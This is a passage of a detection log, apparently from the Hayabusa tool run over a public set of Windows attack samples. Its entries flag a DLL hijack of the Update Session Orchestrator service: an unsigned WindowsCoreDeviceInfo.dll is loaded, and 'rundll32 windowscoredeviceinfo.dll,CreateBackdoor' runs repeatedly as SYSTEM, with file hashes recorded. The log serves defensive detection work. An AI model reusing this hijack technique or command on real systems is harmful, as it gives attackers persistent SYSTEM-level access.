| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: 
SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
